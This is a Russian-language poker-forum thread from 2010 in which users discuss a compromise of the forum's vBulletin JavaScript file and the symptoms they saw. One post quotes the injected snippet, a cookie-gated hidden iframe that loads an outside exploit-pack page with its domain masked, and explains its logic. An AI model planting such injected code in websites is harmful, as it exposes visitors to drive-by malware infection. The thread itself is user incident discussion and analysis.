Опять хакнули форум ЦГМ.

maasea · 12.09.2010, 23:04 TS

собственно, любой может убедиться разлогинившись.
подгружается стандартный для vbulletin скрипт clientscript/vbulletin_md5.js в который кто-то ловко вставил ифрейм со ссылкой на левый домен в зоне .com - можете посмотреть исходник сами.
возможно, левый код вставили и в другие скрипты, не проверял.

HeatherAle · 12.09.2010, 23:09

скинь скриншот
я пытался найти через гугл хром свой- не смог.

maasea · 12.09.2010, 23:15 TS

выделенный фрагмент.

jiamo · 12.09.2010, 23:31

Чем чревато?

maasea · 12.09.2010, 23:35 TS

на макскацоффе тоже кстати такой же ифрейм запихнули.

чревато тем, что ифрейм подгружает пак эксплойтов скорее всего. конечно не факт, что они расчитаны именно на твою версию браузера, тут уж как повезет.

School47 · 13.09.2010, 13:32

как защитится от этого?

futualien · 13.09.2010, 17:33

Не сказал бы что прямо "хакнули", просто это была "бомба" - когда устанавливали форум, была такая строчка кода в скрипте и если вы понимаете в программировании, то увидите, что срабатывает она только при определенных условиях.

Skill · 13.09.2010, 17:56

Что за бомба, кто мог заминировать и при каких условиях сработает?

futualien · 17.09.2010, 11:00

Цитата:

Сообщение от Skill

Что за бомба, кто мог заминировать и при каких условиях сработает?

"Бомба" срабатывала, если вы удовлетворяли некоторым условиям, заданным злоумышленником. Их суть не так важна, но вот результат вполне впечатляет: не все пользователи "подрывались", поэтому так долго и пролежала. Кто-то даже и не замечал, а кто-то замечал, но молчал.

Сработать уже она не сможет, т.к. была удалена =) А заминировать мог кто-угодно, если скрипты форума были скачаны () не с официального ресурса. Но даже и на официальном ресурсе производителей форума мог быть "злой дядька", который такую эффективную штуку и сделал, например перед увольнением или для получения выгоды.

Lure · 17.09.2010, 11:20

Конкретнее, кто пострадал? А то я может напоролся и не знаю.

MaxBNuts · 17.09.2010, 16:28

Цитата:

Сообщение от Lure

Конкретнее, кто пострадал? А то я может напоролся и не знаю.

Поддерживаю любопытность, а то "бомбы" , "подрывы", "злые дядьки"

) Лучше горькая правда, чем "вода".

stein · 17.09.2010, 19:18

И условия какие были интересно бы узнать - может кто-то из форумчан удовлетворял им и не знает до сих пор

zigretc · 17.09.2010, 22:46

че за расклад, какая бомба?? Я думаю надо написать конкретно, а не отписываться.

futualien · 18.09.2010, 12:49

Был такой код в скрипте:
[spoiler="вредный код"]
if (document.cookie.search("vb=555") == -1) {document.write("<if" + "rame src=http://ххх" + "хххх.com/fl/show.php style=display:none></ifra" + "me>"); document.cookie = "vb=555; expires=Sun, 10-Jan-2012 01:00:00 GMT;path=/";}
[/spoiler]
Логика кода:
1) проверяем, установлен ли кукис vb=555
2) если нет, то вписываем в окно фрейм и устанавливаем этот кукис до 10 января 2012 года
3) если кукис установлен, то ничего не делаем

Результат: исполнения
При первом заходе на форум неавторизованным вам вшивается этот фрейм и вы сами того не ведая загружаете страничку хакера, где выполняется Java-апплет (если установлена Java-машина), который запускает посещение другой страницы, содержащей javascript-код, приложением (например у меня вылез запрос на открытие файла, Opera 10.62). Во все последующие посещения форума скрипт вас затрагивать не будет, пока вы не очистите кукисы или не наступит 10 января 2012г., когда скрипт отработает вновь.

Отмечу, что:
1) Java-машина мало у кого установлена и фрейм откроется пустым
2) Скрипт ориентирован на какое-то конкретное приложение
3) файл имел давность начала 2009 года, соответственно можно предположить, что уязвимость какая-то старая и уже давно пофиксена обновлением уязвимой программы
4) не забывайте проверять компьютер на вирусы хотя бы раз в 1 неделю

MaxBNuts · 20.09.2010, 05:35

Не знаю что это, но очень неприятно!
В трее появляется значок явы, а потом вылетает такая ошибка! При заходе на любую страницу CGM, началось минут 40 назад.
Объясните что это, чем опасно и как лечится..

Dr.Dorsanval · 20.09.2010, 09:32

Цитата:

Сообщение от MaxBNuts

Не знаю что это, но очень неприятно!
В трее появляется значок явы, а потом вылетает такая ошибка! При заходе на любую страницу CGM, началось минут 40 назад.
Объясните что это, чем опасно и как лечится..

а у меня в течении часа открывался медиа плеер, и выкидывало на главную страницу, только при входе на цгм и при попытке зайти в какой-нибудь раздел, при этом каспер сильно ругался=(( хз что такое, сейчас зашел все норм.

maasea · 20.09.2010, 10:05 TS

через ифрейм грузился пак эксплойтов, который использует известные уязвимости браузеров/адоб ридера/вм плеера/явы/чего там еще придумают для загрузки к вам на компьютер связки вирусов.

то, что у вас при открытии сайта с таким ифреймом вылезает медиа плеер или адоб ридер (или любая другая программа) с ошибкой и ругается антивирус, говорит о том, что ваш браузер небезопасен и не стоит ставить эксперименты над сохранностью своих счетов в румах заходя с его помощью на ЦГМ, где за неделю уже 2 раза вставили один и тот же ифрейм (за год это уже минимум третий случай).

pyjka · 20.09.2010, 10:48

вот что мне выдает фаерфокс

тоже самое и гугл хром выдает

HighLamas · 20.09.2010, 11:04

у меня тоже самое

WhiteTrash · 20.09.2010, 11:43

+1
Что это за фигня? Я отключил пока это предупреждение.

12.09.2010, 23:04 TS	#1 (permalink)
maasea Увлечённый Регистрация: 08.06.2009 Адрес: Петербург Сообщений: 568	собственно, любой может убедиться разлогинившись. подгружается стандартный для vbulletin скрипт clientscript/vbulletin_md5.js в который кто-то ловко вставил ифрейм со ссылкой на левый домен в зоне .com - можете посмотреть исходник сами. возможно, левый код вставили и в другие скрипты, не проверял.
	Facebook Twitter vKontakte Ответить 0

12.09.2010, 23:09	#2 (permalink)
HeatherAle Увлечённый Регистрация: 26.01.2007 Адрес: 1 Сообщений: 682	скинь скриншот я пытался найти через гугл хром свой- не смог. __________________ God plays against Chuck norris; God goes all in and Chuck says raise!
	Ответить 0

12.09.2010, 23:15 TS	#3 (permalink)
maasea Увлечённый Регистрация: 08.06.2009 Адрес: Петербург Сообщений: 568	выделенный фрагмент.
	Ответить 0

12.09.2010, 23:31	#4 (permalink)
jiamo Старожил Регистрация: 12.12.2008 Адрес: Москва Сообщений: 1,128	Чем чревато? __________________ Не играю на partypoker, bwin и фонбет .
	Ответить 0

12.09.2010, 23:35 TS	#5 (permalink)
maasea Увлечённый Регистрация: 08.06.2009 Адрес: Петербург Сообщений: 568	на макскацоффе тоже кстати такой же ифрейм запихнули. чревато тем, что ифрейм подгружает пак эксплойтов скорее всего. конечно не факт, что они расчитаны именно на твою версию браузера, тут уж как повезет.
	Ответить 0

13.09.2010, 13:32	#6 (permalink)
School47 Старожил Регистрация: 08.04.2009 Сообщений: 1,174	как защитится от этого? __________________ Make Poker Great Again
	Ответить 0

13.09.2010, 17:33	#7 (permalink)
futualien Увлечённый Регистрация: 14.11.2009 Адрес: cgm.ru Сообщений: 459	Не сказал бы что прямо "хакнули", просто это была "бомба" - когда устанавливали форум, была такая строчка кода в скрипте и если вы понимаете в программировании, то увидите, что срабатывает она только при определенных условиях. __________________ ВНИМАНИЕ!!! Ерунда в подписи. Когда я ем - я глух и нем, хитер и быстр, и дъявольски умён!
	Ответить +2 (+2/-0)

13.09.2010, 17:56	#8 (permalink)
Skill Старожил Регистрация: 14.02.2009 Адрес: .by Сообщений: 858	Что за бомба, кто мог заминировать и при каких условиях сработает? __________________ "I'm a player. I always will be. I can not be anyone else..."
	Ответить +6 (+7/-1)

17.09.2010, 11:20	#10 (permalink)
Lure ('''/(-.-)/''') Регистрация: 09.07.2007 Адрес: Москва Сообщений: 2,942	Конкретнее, кто пострадал? А то я может напоролся и не знаю. __________________ The problem with wanting something is the fear of losing it, or never getting it.
	Ответить +3 (+3/-0)

17.09.2010, 19:18	#12 (permalink)
stein Бессмертный Регистрация: 03.04.2006 Адрес: Санкт-Петербург Сообщений: 6,622	И условия какие были интересно бы узнать - может кто-то из форумчан удовлетворял им и не знает до сих пор
	Ответить +1 (+1/-0)

17.09.2010, 22:46	#13 (permalink)
zigretc Ветеран Регистрация: 06.03.2008 Адрес: москва Сообщений: 1,350	че за расклад, какая бомба?? Я думаю надо написать конкретно, а не отписываться. __________________ Мы - русские, мы все можем! Александр Суворов.
	Ответить 0

18.09.2010, 12:49	#14 (permalink)
futualien Увлечённый Регистрация: 14.11.2009 Адрес: cgm.ru Сообщений: 459	Был такой код в скрипте: [spoiler="вредный код"] if (document.cookie.search("vb=555") == -1) {document.write("<if" + "rame src=http://ххх" + "хххх.com/fl/show.php style=display:none></ifra" + "me>"); document.cookie = "vb=555; expires=Sun, 10-Jan-2012 01:00:00 GMT;path=/";} [/spoiler] Логика кода: 1) проверяем, установлен ли кукис vb=555 2) если нет, то вписываем в окно фрейм и устанавливаем этот кукис до 10 января 2012 года 3) если кукис установлен, то ничего не делаем Результат: исполнения При первом заходе на форум неавторизованным вам вшивается этот фрейм и вы сами того не ведая загружаете страничку хакера, где выполняется Java-апплет (если установлена Java-машина), который запускает посещение другой страницы, содержащей javascript-код, приложением (например у меня вылез запрос на открытие файла, Opera 10.62). Во все последующие посещения форума скрипт вас затрагивать не будет, пока вы не очистите кукисы или не наступит 10 января 2012г., когда скрипт отработает вновь. Отмечу, что: 1) Java-машина мало у кого установлена и фрейм откроется пустым 2) Скрипт ориентирован на какое-то конкретное приложение 3) файл имел давность начала 2009 года, соответственно можно предположить, что уязвимость какая-то старая и уже давно пофиксена обновлением уязвимой программы 4) не забывайте проверять компьютер на вирусы хотя бы раз в 1 неделю __________________ ВНИМАНИЕ!!! Ерунда в подписи. Когда я ем - я глух и нем, хитер и быстр, и дъявольски умён!
	Ответить 0

20.09.2010, 05:35	#15 (permalink)
MaxBNuts Бессмертный Регистрация: 02.09.2008 Адрес: Екатеринбург Сообщений: 10,799	Не знаю что это, но очень неприятно! В трее появляется значок явы, а потом вылетает такая ошибка! При заходе на любую страницу CGM, началось минут 40 назад. Объясните что это, чем опасно и как лечится.. Изображения __________________ Без труда не вытащишь и рыбку со стола
	Ответить 0

20.09.2010, 10:05 TS	#17 (permalink)
maasea Увлечённый Регистрация: 08.06.2009 Адрес: Петербург Сообщений: 568	через ифрейм грузился пак эксплойтов, который использует известные уязвимости браузеров/адоб ридера/вм плеера/явы/чего там еще придумают для загрузки к вам на компьютер связки вирусов. то, что у вас при открытии сайта с таким ифреймом вылезает медиа плеер или адоб ридер (или любая другая программа) с ошибкой и ругается антивирус, говорит о том, что ваш браузер небезопасен и не стоит ставить эксперименты над сохранностью своих счетов в румах заходя с его помощью на ЦГМ, где за неделю уже 2 раза вставили один и тот же ифрейм (за год это уже минимум третий случай).
	Ответить 0

20.09.2010, 10:48	#18 (permalink)
pyjka SHIP IT Регистрация: 08.10.2009 Адрес: Value City Сообщений: 5,270	вот что мне выдает фаерфокс тоже самое и гугл хром выдает __________________ дневник SHIP IT >><
	Ответить +1 (+1/-0)

20.09.2010, 11:43	#20 (permalink)
WhiteTrash KING'S BLEND Регистрация: 27.08.2008 Адрес: Москва Сообщений: 3,136	+1 Что это за фигня? Я отключил пока это предупреждение. __________________ "Мы никогда не проигрываем, нам иногда не хватает времени!" (С) Sir Alexander Chapman Ferguson
	Ответить 0

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ЦГМ хакнули или глюк?	DmitryLove	Техническая поддержка форума	83	13.03.2010 21:52
Ну и меня хакнули :(	Jackdaw	Ввод-вывод денег	33	01.07.2008 16:55
Хакнули webmoney. Срочно нужен совет	iva8888	Ввод-вывод денег	4	12.06.2008 20:28
Опять тузы и опять не знаю как играть, Nl25 5max	mordovorot	Безлимитный холдем микро бай-инов	30	03.03.2008 15:42

20.09.2010, 11:04	#19 (permalink)
HighLamas Новороссия Регистрация: 03.01.2008 Адрес: Донецк Сообщений: 8,364	у меня тоже самое __________________ Новороссия
	Ответить 0